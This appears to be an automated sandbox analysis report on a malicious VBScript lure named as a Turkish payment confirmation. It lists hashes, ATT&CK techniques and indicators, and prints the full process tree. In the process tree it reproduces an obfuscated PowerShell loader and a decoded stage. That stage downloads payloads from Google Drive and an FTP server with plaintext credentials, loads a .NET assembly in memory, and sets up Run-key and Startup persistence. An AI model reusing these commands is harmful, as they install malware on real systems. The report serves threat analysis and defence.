c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f

Analysis

max time kernel
136s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-11-2024 23:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ödeme Onayı.vbs
Size

586KB
MD5

dbc2b2c1ad1e78348f9336869fbf0740
SHA1

7903a4142cb3c3e588710691a8577e5b7ee3c6c6
SHA256

c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f
SHA512

b4751bcaa288a9f0c74e7fac9bd7e9dc74422c71694300debdefebdc42bc077016bb07b2d928be4eb4d9cb16b18e744be35c82d2e2a53a7a0c290692772b94b2
SSDEEP

1536:coooooooooooooooooC99999999999999999999999999999999999999999999/:v3Jg6azbLal3Jg6azbLal3Jg6azbLaO

Score

10^/10

defense_evasion discovery execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
BFwGyaUBMY1578@@

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
15	4840	powershell.exe
26	4840	powershell.exe
28	2832	powershell.exe
35	4840	powershell.exe
36	4840	powershell.exe
38	4840	powershell.exe
40	4840	powershell.exe
42	380	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4712	powershell.exe
1120	powershell.exe
4428	powershell.exe
4472	powershell.exe
380	powershell.exe
4696	powershell.exe
4840	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_qsz = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\igudf.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_lbw = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\igudf.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
41	pastebin.com
42	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2164	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2164	PING.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
4696	powershell.exe
4696	powershell.exe
4840	powershell.exe
4840	powershell.exe
2832	powershell.exe
2832	powershell.exe
2832	powershell.exe
1120	powershell.exe
1120	powershell.exe
4712	powershell.exe
4712	powershell.exe
1120	powershell.exe
4712	powershell.exe
4428	powershell.exe
4428	powershell.exe
4428	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
380	powershell.exe
380	powershell.exe
380	powershell.exe
380	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4696	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	380	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 4696	2936	WScript.exe	84
PID 2936 wrote to memory of 4696	2936	WScript.exe	84
PID 4696 wrote to memory of 4840	4696	powershell.exe	86
PID 4696 wrote to memory of 4840	4696	powershell.exe	86
PID 4840 wrote to memory of 4244	4840	powershell.exe	95
PID 4840 wrote to memory of 4244	4840	powershell.exe	95
PID 4840 wrote to memory of 2164	4840	powershell.exe	96
PID 4840 wrote to memory of 2164	4840	powershell.exe	96
PID 4840 wrote to memory of 2832	4840	powershell.exe	99
PID 4840 wrote to memory of 2832	4840	powershell.exe	99
PID 4840 wrote to memory of 4712	4840	powershell.exe	105
PID 4840 wrote to memory of 4712	4840	powershell.exe	105
PID 4840 wrote to memory of 1120	4840	powershell.exe	106
PID 4840 wrote to memory of 1120	4840	powershell.exe	106
PID 4840 wrote to memory of 4364	4840	powershell.exe	107
PID 4840 wrote to memory of 4364	4840	powershell.exe	107
PID 4840 wrote to memory of 4428	4840	powershell.exe	108
PID 4840 wrote to memory of 4428	4840	powershell.exe	108
PID 4840 wrote to memory of 4472	4840	powershell.exe	109
PID 4840 wrote to memory of 4472	4840	powershell.exe	109
PID 4840 wrote to memory of 380	4840	powershell.exe	110
PID 4840 wrote to memory of 380	4840	powershell.exe	110
PID 4840 wrote to memory of 2544	4840	powershell.exe	111
PID 4840 wrote to memory of 2544	4840	powershell.exe	111

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'lAGwAZQ' + [char]66 + 'jAHQAag' + [char]66 + 'pAG0AaA' + [char]66 + 'lAG4AZA' + [char]66 + 'lAHIAcw' + [char]66 + 'vAG4ALg' + [char]66 + 'jAG8AbQAvAHoALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAIAArACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACcASQ' + [char]66 + 'WAEYAcg' + [char]66 + 'wACcAIAA9ACAAbQ' + [char]66 + 'HAHEAaQ' + [char]66 + 'uACQAOwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAOwAnAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACAAPQAgAEcAaQ' + [char]66 + 'UAHoASgAkADsAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIAA9ACAAbw' + [char]66 + 'UAFIAaA' + [char]66 + 'YACQAOwApACAAKQAnAEEAJwAsACcAkyE6AJMhJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'mAGIAcg' + [char]66 + 'zAG0AJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACAAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAGYAYg' + [char]66 + 'yAHMAbQAkADsAIAAgAH0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + '0AHAAaw' + [char]66 + 'mAHkAJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwAgACkAIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAdA' + [char]66 + 'wAGsAZg' + [char]66 + '5ACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJA' + [char]66 + '7ACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIAAxAC4AMAAuADAALgA3ADIAMQAgAGcAbg' + [char]66 + 'pAHAAOwAgAGMALwAgAGUAeA' + [char]66 + 'lAC4AZA' + [char]66 + 'tAGMAOw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + 'oAGYAZA' + [char]66 + 'wAG4AJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwApACkAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAtACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'GAC0AIA' + [char]66 + '0AHgAZQ' + [char]66 + 'UAG4AaQ' + [char]66 + 'hAGwAUA' + [char]66 + 'zAEEALQAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGUAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC0Abw' + [char]66 + 'UAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMAKAAgACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAFMAUAAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAGgAZg' + [char]66 + 'kAHAAbgAkADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIAbA' + [char]66 + 'wAGsAdAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAAPQAgAEIAbA' + [char]66 + 'wAGsAdAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAALA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Acw' + [char]66 + '4AHYAZA' + [char]66 + '5ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHMAeA' + [char]66 + '2AGQAeQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHMAeA' + [char]66 + '2AGQAeQAkADsAfQA7ACAAKQAnAHQATw' + [char]66 + 'MAGMAXw' + [char]66 + 'LAGEAMw' + [char]66 + 'aAGYAbw' + [char]66 + 'YADIASg' + [char]66 + 'KAHIAVg' + [char]66 + 'oAG0AVgA5AGMAbQA5AFgAcw' + [char]66 + '1AFgAbQ' + [char]66 + 'qADEAZwAxACcAIAArACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAKAAgAD0AIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAMgA0AHUAWA' + [char]66 + 'KAFQAcQ' + [char]66 + 'hAG0AZw' + [char]66 + '5AE0AdA' + [char]66 + 'GAHoAYQ' + [char]66 + 'rAFAAUgAxAHEAXw' + [char]66 + 'JAHYARw' + [char]66 + 'pAFgATg' + [char]66 + 'kAHEAYQ' + [char]66 + 'OADEAJwAgACsAIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoACAAPQAgAHcAdw' + [char]66 + 'zAGcAZwAkAHsAIAApACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHUAbw' + [char]66 + 'XAFoAVAAkAHsAIAApACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAA7AA==';$nqqkv = $qKKzc; ;$nqqkv = $qKKzc.replace('уЦϚ' , 'B') ;;$zmmdr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nqqkv ) ); $zmmdr = $zmmdr[-1..-$zmmdr.Length] -join '';$zmmdr = $zmmdr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs');powershell $zmmdr
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ggsww = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ggsww = ($ggsww + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ggsww = ($ggsww + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$ydvxs = (New-Object Net.WebClient);$ydvxs.Encoding = [System.Text.Encoding]::UTF8;$ydvxs.DownloadFile($ggsww, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$npdfh = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $npdfh -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$yfkpt = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $yfkpt -OutFile $obTxq -UseBasicParsing } ;$msrbf = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $msrbf.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/moc.nosrednehmijtcele//:sptth' , $XhRTo , 'D DD' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4840
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:4244
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
